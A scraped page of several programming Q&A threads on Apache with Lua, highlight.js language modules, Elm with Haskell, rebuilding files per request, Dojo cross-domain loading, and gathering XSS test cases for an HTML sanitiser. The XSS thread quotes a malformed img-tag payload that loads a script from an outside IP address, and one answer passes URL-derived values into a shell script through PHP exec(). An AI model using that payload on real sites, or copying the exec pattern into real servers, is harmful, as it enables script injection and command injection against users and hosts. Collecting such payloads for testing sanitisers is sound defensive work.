lua embeded in html with apache - apache

Apache has mod_lua. Is there a way to have it process an html page with a like tag similar to php?
If not is there some other method? (I've seen mod_plua but it doesn't seem to have much work towards it).

I haven't tried it actually, but Haserl is something what you might need.
It was reported to be working in the lua-users mailing list.
Haserl is a small cgi wrapper that allows "PHP" style cgi programming, but uses a UNIX bash-like shell or Lua as the programming language. It is very small, so it can be used in embedded environments, or where something like PHP is too big.
P.S.
I haven't worked with it, so I'm not eaxctly sure if it works.

For php-style Lua programming, you could definitely use mod_pLua.
Contrary to what your initial statement says, it does have a lot of work put into it, just look at the extra features supported by it.
Whether or not mod_lua will support this kind of programming in the future...who knows :)

You need to update your config. In your Apache config, add the following lines of code:
AddHandler lua-script .lua
AddHandler lua-script .htm .html
That should set the handler for html files to mod_lua (not tested as I don't use this mod).

Related

VB.NET syntax highlight problems using hightlight.js in blog

I use hightlight.js for syntax highlighting in my blog and it works fine for C# and Java. But i have problems with highlight for VB.NET code. Most of keywords and comments not highlighted.
For example:
Public Enum EditorBrowsableState
Always ' Отображается всегда
Never ' Не отображается
Advanced ' Отображается во складке "Все"
End Enum
result here (i use <pre><code class="vb"> as always) (excuse me, i can't now add sample image)
How can i handle this?
I know the question is a bit old and the author apparently stopped using highlight.js in his blog so I even don't know this is the cause. but I'm introducing what made vb codes not highlighted in my case.
It's just because the CDN library I used didn't include VB to begin with.
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/8.5/highlight.min.js"></script>
It only covers apache, bash, zsh, CoffeeScript, C++, C, C#, CSS, Diff, Http, Ini, Java, JSP, JavaScript, JSON, Makefile, Mak, Xml, Markdown, Nginx, Objective-C, Perl, Nginx Conf, PHP, Ruby, Python, Gemspec and so on. If we need something else, we should load the module for it.
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/8.5/languages/vbnet.min.js"></script>

Using elm for front end development + serving dynamic elm pages though haskell

I started with elm yesterday and I really enjoy using it. Without any experience in front end development I could build a nice looking webpage in only 30 lines of code, which is amazing.
Now I really want to use it in a real life example, I want to build a small blog.
But I need a way to communicate with elm. For example I need to query my database and I get a list of blog entries [Blog] and now I need to pass them to elm.
I am not sure how I would do it. I was looking though the popular haskell frameworks like yesod snap and happstack and the first thing that I found was http://hackage.haskell.org/package/snap-elm-0.1.1.2/docs/Snap-Elm.html
But it seems it is intended for serving static elm files, but I need to pass arguments to it.
Any framework that you would recommend me that already has elm support for serving dynamic elm pages?
And if not, how would you do it?
My idea was just to use elm as a skeleton and then I generate a normal html file with yesod snap or happstack and integrate this file into elm. Would this be possible?
Something that would look like this
container 1000 1000 middle <| displayHtml "/pages/my_generated_html_page.html"
Edit:
My first hacky solution was this
tPage = plainText "<script src=\"http://code.jquery.com/jquery-1.10.1.min.js\"></script>\n
<script> \n
$(function(){\n
$(\"#includedContent\).load(\"/home/maik/b.html\"); \n
});\n
</script> \n
<div id=\"includedContent\"></div>\n"
Unfortunately I am not allowed to use script tags in elm.
I recommend studying elm-lang.org's source code. The majority of it is pure Elm but there are pages that are generated on the server side with Haskell.

How can I have my web server automatically rebuild the files it serves?

I sometimes write client-side-only web applications, and I like a simple and fast development cycle. This leads me to project layouts which explicitly have no build step, so that I can just edit source files and then reload in the web browser. This is not always a healthy constraint to place on the design. I would therefore like the following functionality to use in my development environment:
Whenever the server receives a GET /foo/bar request and translates it to a file /whatever/foo/bar, it executes cd /whatever && make foo/bar before reading the file.
What is the simplest way to accomplish this?
The best form of solution would be an Apache configuration, preferably one entirely within .htaccess files; failing that, a lightweight web server which has such functionality already; or one which can be programmed to do so.
Since I have attracted quite a lot of “don't do that” responses, let me reassure you on a few points:
This is client-side-only development — the files being served are all that matters, and the build will likely be very lightweight (e.g. copying a group of files into a target directory layout, or packing some .js files into a single file). Furthermore, the files will typically be loaded once per edit-and-reload cycle — so interactive response time is not a priority.
Assume that the build system is fully aware of the relevant dependencies — if nothing has changed, no rebuilding will happen.
If it turns out to be impractically slow despite the above, I'll certainly abandon this idea and find other ways to improve my workflow — but I'd like to at least give it a try.
You could use http://aspen.io/.
Presuming the makefile does some magic, you could make a simplate that does:
import subprocess
RESULTFILE = "/whatever/foo/bar"
^L
subprocess.call(['make'])
response.body = ''.join(open(resultfile).readlines())
^L
but if it's less magic, you could of course encode the build process into the simplate itself (using something like https://code.google.com/p/fabricate/ ) and get rid of the makefile entirely.
Since I'm a lazy sod, I'd suggest something like that:
Options +FollowSymlinks
RewriteEngine On
RewriteBase /
RewriteRule ^(.*)\/(.*)(/|)$ /make.php?base=$1&make=$2 [L,NC]
A regex pattern like that provides the two required parameters -
Which then can be passed to a shell-script by PHP function exec():
You might need to add exclusions above the pattern or inclusions to the pattern,
e.g define the first back-reference by words - else it would match other requests as well (which shouldn't be re-written).
The parameters can be accessed in shell-script like that:
#!/bin/bash
cd /var/www/$1
make $2
This seems like a really bad idea. You will add a HUGE amount of latency to each request waiting for the "make" to finish. In a development environment that is okay, but in production you are going to kill performance.
That said, you could write a simple apache module that would handle this:
http://linuxdocs.org/HOWTOs/Apache-Overview-HOWTO-12.html
I would still recommend considering if this is what you want to do. In development you know if you change a file that you need to remake. In production it is a performance killer.

How to locally test cross-domain builds?

Using the dojo toolkit, what is the proper way of locally testing code that will be executed as cross-domain, without making the actual build?
As it appears, there are three possible options (each, with their own drawbacks):
Using local (non xd) XMLHttpRequest dojo.require
This option does not really test the xd behavior, since it dojo.require[s] the js synchronously via XHR.
djConfig.debugAtAllCosts = true;
Although this option does load the required code asynchronously (via the 'script' tag), it also pulls the code in via XHR, parses the dojo.require[s] inside that, and pulls them in. This (using the loader_debug), again, is not what the loader_xd is doing. More info on this topic in a different question.
Creating a cross-domain build
This approach requires a build, which is not possible in the environment which I'm running the code in (We're using our own on-the-fly build process, which includes only the js that is necessary for a particular page. This process is not suitable for development).
Thus, my question: is there a way to use the loader_xd, which does not require an xd build (which adds the xd prefix / suffix to every file)?
The 2nd way (using the debugAtAllCosts) also makes me question the motivation for pre-parsing the dojo.require[s]. If the loader_xd will not (or rather can not) pre-parse, why is the method that was created for testing/debugging doing so?
peller has described the situation. If you wanted to just generate .xd.js file for your modules, you could look at util/buildscripts/jslib/buildUtilXd.js and its buildUtilXd.xdgen() function.
It would take a bit of work to make your own script, but you could look at util/buildscripts/build.js for pointers.
I am hoping in the future for Dojo (maybe Dojo 2.x timeframe) we can switch to a loader that just uses script tags with a module format that has a function wrapper around the module, something that is coded by the developer. This would allow the same module format to work in the local and xd cases.
I don't think there's any way to do XD loading without building and deploying it. Your analysis of the various options seems about right.
debugAtAllCosts is there specifically to solve a debugging problem, where most browsers, until recently, could not do anything intelligent with code brought in through eval. Still today, Firefox will report exception in the console as appearing at the eval site (bootstrap.js) with a line number offset from the eval, rather than from the actual eval buffer, and normally that eval buffer is anonymous. Firebug was the first debugger to jump through some hoops to enhance the debugging experience and permitted special metadata that Dojo's loader injects between the XHR and the eval to determine a filepath to the source. Webkit/Safari have recently implemented this also. I believe debugAtAllCosts pre-dates the XD loader.

XSS Torture Test - does it exist?

I'm looking to write a html sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
I know there's a Mime Torture Test which comprises of several nested emails with attachments that's used to test Mime decoders (if they can decode it properly, then they've been proven to work). I'm basically looking for an equivilent for XSS, i.e. a list of examples of dodgy html that I can throw at my sanitiser just to make sure it works OK.
If anyone also has any good resources on how to write the sanitiser (i.e. what common exploits people try to use, etc) they'd be gratefully received too.
Thanks in advance :-)
Edit: Sorry if this wasn't clear before, but I was after a set of torture tests so I can write unit tests for the sanitiser, not test it in the browser, etc. The source data in theory may have come from anywhere - not just a browser.
Take a look at this XSS Cheat List : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
XSS Me is a great Firefox plugin you can run against your sanitizer.
Check out OWASP. They have good guidance on how XSS works, what to look for, and even the WebGoat project, where you can try your hand on a vulnerable site.
You might try Jesse Ruderman's jsfunfuzz (http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/) that throws random data at your Javascript trying to break it. It seems the Firefox team has used this with great success.